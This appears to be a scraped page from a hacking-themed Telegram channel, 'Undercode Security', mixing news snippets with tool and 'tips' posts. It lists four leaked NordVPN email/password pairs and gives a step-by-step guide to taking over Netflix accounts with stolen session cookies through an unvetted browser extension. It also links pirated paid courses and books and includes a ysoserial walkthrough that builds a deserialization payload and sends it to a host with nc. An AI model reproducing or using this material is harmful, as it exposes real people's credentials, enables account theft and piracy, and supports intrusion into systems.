UNDERCODE SECURITY
225 subscribers
295 photos
1.03K files
1.73K links
πŸ¦‘WELCOME IN UNDERCODE TESTING FOR LEARN HACKING | PROGRAMMING | SECURITY & more..

THIS CHANNEL BY :

@UndercodeTesting
UndercodeTesting.com (official)

@iUndercode
iUndercode.com (iOs)

@Dailycve
DailyCve.com


@UndercodeNews
UndercodeNews.com
Download Telegram
Forwarded from Backup Legal Mega
πŸ¦‘TOP The Complete Cyber Security Course : Hackers Exposed!

Volume 1 : Become a Cyber Security Specialist, Learn How to Stop Hackers, Prevent Hacking, Learn IT Security & INFOSEC

Description :
This course covers the fundamental building blocks of your required skill set - You will understand the threat and vulnerability landscape through threat modeling and risk assessments.
We explore the Darknet and mindset of the cyber criminal. Covering malware, exploit kits, phishing, zero-day vulnerabilities and much more.
You will learn about the global tracking and hacking infrastructures that nation states run. Covering the NSA, FBI, CIA, GCHQ, China’s MSS and other intelligence agencies capabilities.

Source :
https://www.udemy.com/the-complete-internet-security-privacy-course-volume-1/


https://mega.nz/folder/m1IlgaAD#9NUMg-DVIakAfBvi9bna-w


ENJOYβ€οΈπŸ‘πŸ»
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘NordVpn Premium :

Email\Username: damian.urek5@gmail.com
Password: ikGT60v3
Account Type: PREMIUM
Expires On: 02 September, 2020 [13 Days Left]

Email\Username: trevorgsnake@gmail.com
Password: Robot413
Account Type: PREMIUM
Expires On: 07 December, 2020 [109 Days Left]

Email\Username: ryantupa20@gmail.com
Password: punx1977
Account Type: PREMIUM
Expires On: 23 August, 2020 [3 Days Left]

Email\Username: yyonatanccervantes@gmail.com
Password: Yc101206
Account Type: PREMIUM
Expires On: 06 June, 2022 [655 Days Left]

▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘LES: Linux privilege escalation auditing tool:

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

1)DOWNLOAD :

wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh

> Details about LES usage and inner workings:

https://mzet-.github.io/2019/05/10/les-paper.html
Additional resources for the LES:

https://github.com/mzet-/les-res

2) cd dir

3) $ ./linux-exploit-suggester.sh

4) For each exploit, exposure is calculated. Following 'Exposure' states are possible:

1️⃣Highly probable - assessed kernel is most probably affected and there's a very good chance that PoC exploit will work out of the box without any major modifications.

2️⃣Probable - it's possible that exploit will work but most likely customization of PoC exploit will be needed to suit your target.

3️⃣Less probable - additional manual analysis is needed to verify if kernel is affected.

4️⃣Unprobable - highly unlikely that kernel is affected (exploit is not displayed in the tool's output)

5) Verifying state of kernel hardening security measures
LES can check for most of security settings available by your Linux kernel. It verifies not only the kernel compile-time configurations (CONFIGs) but also verifies run-time settings (sysctl) giving more complete picture of security posture for running kernel. This functionality is modern continuation of --kernel switch from checksec.sh tool by Tobias Klein. Example of tool output:

$ ./linux-exploit-suggester.sh --checksec

6) Assess exposure of the Linux box on publicly known exploits:

$ ./linux-exploit-suggester.sh
Show state of security features on the Linux box:

$ ./linux-exploit-suggester.sh --checksec
Assess exposure of Linux kernel on publicly known exploits based on the provided 'uname' string (i.e. output of uname -a command):

$ ./linux-exploit-suggester.sh --uname <uname-string>


USE FOR LEARN !!!
verified @UndercodeTesting
βœ…git topic
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Find_Details_Of_any_Mobile_Number,_Email_ID,_IP_Address_in_the_world.pdf
2.5 MB
Find Details Of any Mobile Number, Email ID, IP Address in the world (Step By Step) #Highrequested
Forwarded from UNDERCODE NEWS
The world's largest ATM makers, Diebold Nixdorf and NCR, have released software updates for their devices.
#Vulnerabilities
Forwarded from UNDERCODE NEWS
University of Utah officials said the university has recently been compelled to pay hackers $457,059 to avoid leaking of student records #Leaks
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘#EXPLOITATION :

> ysoserial is a collection of utilities and property-oriented programming "gadget chains" discovered in common java libraries that can, under the right conditions, exploit Java applications performing unsafe deserialization of objects. The main driver program takes a user-specified command and wraps it in the user-specified gadget chain, then serializes these objects to stdout. When an application with the required gadgets on the classpath unsafely deserializes this data, the chain will automatically be invoked and cause the command to be executed on the application host.

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

1) downloadf https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
2) $ java -jar ysoserial.jar

3) Y SO SERIAL?
Usage: java -jar ysoserial.jar [payload] '[command]'

4) $ java -jar ysoserial.jar CommonsCollections1 calc.exe | xxd

0000000: aced 0005 7372 0032 7375 6e2e 7265 666c ....sr.2sun.refl

0000010: 6563 742e 616e 6e6f 7461 7469 6f6e 2e41 ect.annotation.A
0000020: 6e6e 6f74 6174 696f 6e49 6e76 6f63 6174 nnotationInvocat
...
0000550: 7672 0012 6a61 7661 2e6c 616e 672e 4f76 vr..java.lang.Ov
0000560: 6572 7269 6465 0000 0000 0000 0000 0000 erride..........
0000570: 0078 7071 007e 003a .xpq.~.:

5) $ java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin

6) $ nc 10.10.10.10 1099 < groovypayload.bin

7) $ java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe

πŸ¦‘R E Q U I R E M E N T S :

Requires Java 1.7+ and Maven 3.x+

mvn clean package -DskipTests

VERIFIED @undercodeTesting
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from Backup Legal Mega
πŸ¦‘ND10X – 10X Your Money In 10 Days Trading System β€” 5.78 GBβ€”

https://mega.nz/folder/P0hAHY4b#s1OZubIdV1c2TNcOvpQ86g
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘What should I do if the website is hacked and injected into the blog color page

Whenever there are competitions such as the European Cup, the World Cup, and the Olympic Games, various gaming groups resort to their best efforts to hack normal websites, especially high-traffic information websites. Through internal testing, Baidu found that the number of sites hacked during the European Cup is on the rise. Baidu has increased the efficiency and intensity of punishment. So, how can we avoid being hacked as a site?

[Self-check whether it has been hacked]

1. The hacked website has a feature in the data, that is, the amount of index and the traffic brought from search engines have increased dramatically in a short period of time . Therefore, the webmaster can benefit from the index volume tool of the Baidu webmaster platform to observe whether there is an abnormality in the site’s inclusion volume; if a sudden increase is found, use the traffic and keyword tool to check whether the keywords obtained are related to the website, whether it involves gambling and pornography .

2. Query the site through Site grammar, and combine some common pornographic and gambling keywords to achieve better results. It is possible to find illegal pages that do not belong to the site.

3. Due to the huge traffic of Baidu, some hacked behaviors only redirect the traffic brought by Baidu, which is difficult for the webmaster to find. Therefore, when checking whether your site is hacked, you must click on the site page from the Baidu search results to view Did you jump to other sites?

4. The content of the site is shown as risky in the search results.

*Subsequently, you can ask website technicians to further confirm whether the website is hacked through background data and programs

[How to deal with after being hacked]

After confirming that the website is hacked, in addition to prompting technical staff to make quick corrections, SEO staff also need to do some after-care and preventive work.

1. Immediately stop the website service to prevent users from continuing to be affected and prevent other sites from continuing to be affected (recommended to use the 503 return code).

2. If multiple sites of the same hosting provider are hacked during the same period, you can contact the hosting provider to urge the other party to respond.

3. Clean up the discovered hacked content, set the hacked page as a 404 dead link, and submit it through the dead link submission tool of the Baidu webmaster platform.

4. Check out the possible hacking time, compare it with the file modification time on the server, and deal with the files uploaded and modified by hackers; check the user management settings in the server to confirm whether there are abnormal changes; change the user of the server Access password. Note: The possible hacking time can be determined from the access log. However, the hacker may also modify the server's access log.

5. Do a good job in security, check the loopholes in the website, and prevent it from being hacked again.

The above is the processing method of the website being hacked into the blog color page.

@UndercodeTesting
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘lcx usage experience (piracy)
example Why do port forwarding?

If an external network server, we can access it directly by connecting to its port without port forwarding.

Generally we are divided into four situations:

1. Intranet of this machine: It can be directly connected to the external network of the machine, for example, when we browse the website, connect in time Port 80 of the external network server;

2. External network of this machine: external network of other machine ----------------------------same as the above example;

3. External network of this machine: Intranet of other machine -------------------------If we open port 3389 of its server after getting the webshell, but when We connected to its port 3389 but couldn't connect to it. At this time, experienced people should have checked the status of the server and got webshell-check ipconfig. Everyone understands this, so I won't explain it! This is the second highlight of what I want to talk about: At this time, our idea is to forward its 3389 port. At this time, we will use lcx.exe.

@UndercodeTesting
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from Backup Legal Mega
πŸ¦‘Another 246 books as following
Batch One Update 2.5 GIGA BYTE OF BOOKS
1- .NET 13 BOOK
2- ANGULAR 12 BOOK
3- BOOTSTRAP 30 BOOK
4-FRONT END 16 BOOK
5-HTML - CSS 42 BOOK
6- JAVA 30 BOOK
7- JAVA SCRIPT 78 BOOK
8- NODE JS 25 BOOK

TOTAL BOOKS 246 BOOK

E N J O Y β€οΈπŸ‘πŸ»
https://drive.google.com/drive/u/1/folders/1aXlI-fNsCGmwrFLjSSkHA3FSTClnSSnb
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘2020 Free Netflix account -Hacking methode 100% working :
In connection with the release of the movie "Black Mirror: Bandashmyg". As a sixteen-year-old schoolboy who does not have a credit card to go through the last stage of registration, I wanted to watch this film. Now I will tell you the actual way how to get a free Netflix account in order to feel all the interactivity of this film and enjoy the series on this wonderful service.

1) First, you need to download the archive https: //drive.google.com/open? Id = 1yM55TY7PAvrrXZBDRUSWQMgBtB ... for further manipulations. We unpack the archive to the desktop and go to google chrome. Open the extension in the browser and turn on "developer mode".

2) Then click on "download unpacked extension" and select the folder of the previously unpacked archive. We see that a new extension has appeared. We turn it on.

3)Next, we need to go to this site https://tecknity.com/free-netflix-account-cookies/ and scroll to the bottom. We select any cookie and click on it.

4) We confirm the captcha, click on go to link and wait 20 seconds. After the timeout, click on go to link again. After that, a page with a cookie opens, and we don't scroll through anything else. We stay on the page and find our extension in the upper right corner. Click on it.

5) Then you need to click on "use this cookie"

6) You should be transferred to the Netflx website. Here you need to select any user.

7) accounts are in different languages, it's not scary. while watching a video, you can change the language in the player at your discretion (not all TV shows have Russian).

8) It happens that the following error is displayed:

Free Netflix Account Netflix, Free, Longpost
With such an error, we simply select another account

9) Free Netflix Account Netflix, Free, Longpost
If this did not help, then go back to the site with the cookie and select any other one.

Happy viewing ! (All accounts have a subscription and you can watch any series

use for learn
verified βœ… methode
@UndercodeTesting
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁